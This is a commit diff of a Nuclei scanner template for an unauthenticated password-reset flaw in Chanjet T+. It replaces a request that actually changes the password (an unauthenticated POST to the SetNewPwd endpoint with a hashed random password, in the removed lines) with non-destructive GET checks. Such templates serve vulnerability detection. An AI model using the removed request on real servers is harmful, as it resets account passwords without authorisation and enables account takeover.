Update and rename chanjet-tplus-unauth-update.yaml to chanjet-tplus-unauth-passreset.yaml

http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml

@@ -1,7 +1,7 @@
-id: chanjet-tplus-unauth-update
+id: chanjet-tplus-unauth-passreset
 
 info:
-  name: Chanjet Tplus - Unauthorized Password Update
+  name: Chanjet Tplus - Unauthorized Password Reset
   author: 0xr2r
   severity: high
   description: |
@@ -11,39 +11,18 @@ info:
     - https://www.chanjet.com
   metadata:
     verified: true
-  tags: tplus,unauth,chanjet,intrusive
-
-variables:
-  password: '{{randstr}}'
-  hash: '{{md5("{{password}}")}}'
+  tags: tplus,unauth,chanjet
 
 http:
-  - method: POST
+  - method: GET
     path:
+      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}"
       - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      {"pwdNew":"{{hash}}"}
 
-    matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - '^\{\s*"value"\s*:\s*true\s*\}$'
-
-      - type: word
-        part: header
-        words:
-          - "text/plain"
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
       - type: dsl
         dsl:
-          - '"Password: " + password'
-# digest: 4a0a00473045022100d86a6b95384aef2d3076ae5b812359a0507329111ffcaeb50ab5891c61ce72c7022032924c44f485ea89c3fba0be6e84650092f0b96a6241de361d44df74a5944c0f:922c64590222798bb761d5b6d8e72950
+          - "contains(body_1, 'tplus”应用程序中的服务器错误')"
+          - "!contains(body_2, '>请重新登录')"
+        condition: and
+# digest: 4a0a00473045022100d86a6b95384aef2d3076ae5b812359a0507329111ffcaeb50ab5891c61ce72c7022032924c44f485ea89c3fba0be6e84650092f0b96a6241de361d44df74a5944c0f:922c64590222798bb761d5b6d8e72950